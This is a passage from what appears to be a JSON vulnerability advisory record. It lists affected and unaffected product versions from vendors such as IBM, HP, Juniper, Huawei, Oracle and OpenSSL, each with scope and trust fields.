        "scope": "eq",
        "trust": 0.3,
        "vendor": "parallels",
        "version": "5.0"
      },
      {
        "model": "websphere datapower soa appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.4"
      },
      {
        "model": "aura application server sip core",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53002.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.0.5"
      },
      {
        "model": "linerate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "1.6.2"
      },
      {
        "model": "one-x communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.9"
      },
      {
        "model": "winscp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winscp",
        "version": "5.1.1"
      },
      {
        "model": "one-x mobile lite for iphone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "0"
      },
      {
        "model": "documentum content server sp2 p16",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "emc",
        "version": "6.7"
      },
      {
        "model": "sparc enterprise m5000 xcp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "1117"
      },
      {
        "model": "project openssl 1.0.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "junos 12.1x44-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2.4"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "4.3.2"
      },
      {
        "model": "database and middleware automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.20"
      },
      {
        "model": "laserjet enterprise color mfp m575dn cd644a 2302963 436081",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "500"
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "30000"
      },
      {
        "model": "network connect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.0.0.12875"
      },
      {
        "model": "power system s822",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "network connect 8.0r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.21-21"
      },
      {
        "model": "junos pulse for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.22"
      },
      {
        "model": "system x3550m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "79441.42"
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.9"
      },
      {
        "model": "storevirtual 1tb mdl china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.5"
      },
      {
        "model": "proactive network operations center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "algo audit and compliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.2"
      },
      {
        "model": "project openssl 0.9.8f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.40"
      },
      {
        "model": "airwave",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "7.2.2"
      },
      {
        "model": "vfabric application director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.2"
      },
      {
        "model": "color laserjet printer series q5981a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "380046.80.8"
      },
      {
        "model": "enterprise virtualization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "junos 11.2r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "malware analysis appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.1"
      },
      {
        "model": "ip video phone e20",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "1.2.2"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "blackberry enterprise service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "10.1.2.6"
      },
      {
        "model": "junos 10.2r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storevirtual 900gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433011.5"
      },
      {
        "model": "proxysg sgos",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.5.4.4"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.5"
      },
      {
        "model": "project openssl beta3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "mate products",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.2"
      },
      {
        "model": "websphere datapower xml accelerator xa35",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.0.8"
      },
      {
        "model": "project openssl 1.0.1a",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "laserjet pro m401a/d/dn/dnw/dw/n cz195a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "40020150212"
      },
      {
        "model": "integrity sd2 cb900s i2 and i4 server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.7.98"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.010"
      },
      {
        "model": "flex system p260",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "one-x communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.4"
      },
      {
        "model": "storevirtual 4tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.5"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "3.1.9"
      },
      {
        "model": "firepass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "7.0"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.37"
      },
      {
        "model": "pulse desktop 4.0r11.1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "srg1200\u00262200\u00263200 v100r002c02hp0001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "laserjet p4015 cb510a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "1.0.2"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.8"
      },
      {
        "model": "sterling connect:enterprise for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.4"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "ive os 7.4r6",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 13.3r3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "56000"
      },
      {
        "model": "puredata system for hadoop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.00"
      },
      {
        "model": "utm manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sophos",
        "version": "4.1"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.29"
      },
      {
        "model": "laserjet printer series q7699a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9040/90508.260.3"
      },
      {
        "model": "messaging secure gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "7.5"
      },
      {
        "model": "junos 12.1x44-d35",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.5.5"
      },
      {
        "model": "jabber guest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.23"
      },
      {
        "model": "m220 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "websphere datapower xml security gateway xs40",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.03"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "77009.7"
      },
      {
        "model": "8.4-release-p9",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "web security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.0.2"
      },
      {
        "model": "s2750\u0026s5700\u0026s6700 v200r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "unified agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.1"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58300"
      },
      {
        "model": "jetdirect 695n eio card j8024a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "41.16"
      },
      {
        "model": "data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "7.3.2"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.3"
      },
      {
        "model": "laserjet printer series q5410a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "43508.250.2"
      },
      {
        "model": "espace u19** v100r001c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "data recovery",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.0.3"
      },
      {
        "model": "content security management appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.3.1"
      },
      {
        "model": "uma v200r001c00spc100",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "9.9.1"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "1.0"
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x350073830"
      },
      {
        "model": "storevirtual 450gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.6"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.3"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.1.0"
      },
      {
        "model": "idatplex dx360 m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "79120"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.21"
      },
      {
        "model": "cms r16",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.2.4"
      },
      {
        "model": "telepresence content server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "color laserjet m651 cz256a 2302963 436073",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "oceanstor s6800t v100r005",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "aura system platform sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "project openssl 0.9.8w",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "junos 12.1x47-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "fortisandbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "3.2.12"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.121"
      },
      {
        "model": "digital media players series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "44000"
      },
      {
        "model": "vdi communicator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.0.1"
      },
      {
        "model": "color laserjet printer series q7494a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "470046.230.6"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "119000"
      },
      {
        "model": "secure analytics 2014.2r3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storevirtual 600gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.5"
      },
      {
        "model": "power ps704 blade",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7891-74x)0"
      },
      {
        "model": "storevirtual 450gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.120"
      },
      {
        "model": "flashsystem 9843-ae1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "840"
      },
      {
        "model": "laserjet enterprise mfp m725 cf067a 2302963 436078",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "laserjet enterprise p3015 ce525a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.186.1"
      },
      {
        "model": "nsx for vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0.4"
      },
      {
        "model": "junos 13.1r3-s1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.24"
      },
      {
        "model": "project openssl 1.0.1g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "big-ip edge clients for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "7101"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4"
      },
      {
        "model": "netscaler build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "8.157.3"
      },
      {
        "model": "laserjet cm3530 multifunction printer cc519a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "laserjet enterprise m4555 mfp ce738a 2302963 436064",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.48"
      },
      {
        "model": "horizon workspace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.5"
      },
      {
        "model": "storevirtual 600gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "413012.6"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.9"
      },
      {
        "model": "ips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "espace usm v100r001 v100r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "idp series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "laserjet enterprise p3015 ce527a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.186.1"
      },
      {
        "model": "laserjet enterprise p3015 ce526a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.186.1"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "13.1"
      },
      {
        "model": "storevirtual 1tb mdl sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433011.5"
      },
      {
        "model": "oncommand unified manager core package",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5"
      },
      {
        "model": "tivoli netcool/system service monitor fp12",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "watson explorer",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.0.4"
      },
      {
        "model": "laserjet enterprise mfp m630 series b3g86a 2303714 233000041",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "system storage ts3400 tape library",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0042"
      },
      {
        "model": "email security gateway anywhere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.8.1"
      },
      {
        "model": "junos 12.3r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "storevirtual 900gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.5"
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.2.143"
      },
      {
        "model": "nexus switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "31640"
      },
      {
        "model": "laserjet m3035 multifunction printer cb415a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "laserjet cm3530 multifunction printer cc520a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "messagesight server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0"
      },
      {
        "model": "ive os 8.0r4.1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 11.4r7",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "fusionsphere v100r003c10spc600",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "msr93x family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.47"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.2"
      },
      {
        "model": "color laserjet multifunction printer series q7520a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "400046.380.3"
      },
      {
        "model": "telepresence advanced media gateway series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "airwave",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "7.7.12"
      },
      {
        "model": "security analytics platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.0"
      },
      {
        "model": "flashsystem 9846-ae1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "840"
      },
      {
        "model": "tivoli workload scheduler distributed fp03",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6.0"
      },
      {
        "model": "smc2.0 v100r002c01b025sp07",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "s2700\u0026s3700 v100r006",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "project openssl 0.9.8r",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "espace cc v200r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "9250c digital sender cb472a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.293.1"
      },
      {
        "model": "protection service for email",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "7.1"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.31"
      },
      {
        "model": "laserjet enterprise color mfp m880 d7p71a 2302963 436068",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "800"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.0.8"
      },
      {
        "model": "netezza diagnostic tools",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0"
      },
      {
        "model": "laserjet m4345 multifunction printer cb427a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.21"
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "8.1.68.7"
      },
      {
        "model": "elan",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "8.2"
      },
      {
        "model": "isoc v200r001c01",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "5000"
      },
      {
        "model": "malware analyzer g2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.5"
      },
      {
        "model": "ds8870",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3"
      },
      {
        "model": "laserjet enterprise color m855 a2w77a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8000"
      },
      {
        "model": "storevirtual 600gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473011.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.81"
      },
      {
        "model": "websphere datapower soa appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.2.15"
      },
      {
        "model": "linerate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.2.2"
      },
      {
        "model": "dgs-1500-28",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "2.51.005"
      },
      {
        "model": "3par service processor sp-4.2.0.ga-29.p003",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "junos 12.1x44-d40",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "s7-1500",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "1.6"
      },
      {
        "model": "project openssl beta4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "esight-ewl v100r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "hyperdp oceanstor n8500 v200r001c91",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "guardium database activity monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "virtual tape library",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.70"
      },
      {
        "model": "storevirtual hybrid san solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433512.0"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.11"
      },
      {
        "model": "cloud service automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.01"
      },
      {
        "model": "project openssl 1.0.0l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "general parallel file system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5.0"
      },
      {
        "model": "color laserjet multifunction printer series q7518a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "400046.380.3"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.13"
      },
      {
        "model": "simatic wincc oa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "3.8"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "laserjet printer series q7544a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "52008.241"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "laserjet enterprise m4555 mfp ce502a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "oic v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "junos space 13.1p1.14",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "dgs-1210-20",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "d link",
        "version": "4.00.041"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.2"
      },
      {
        "model": "system management homepage",
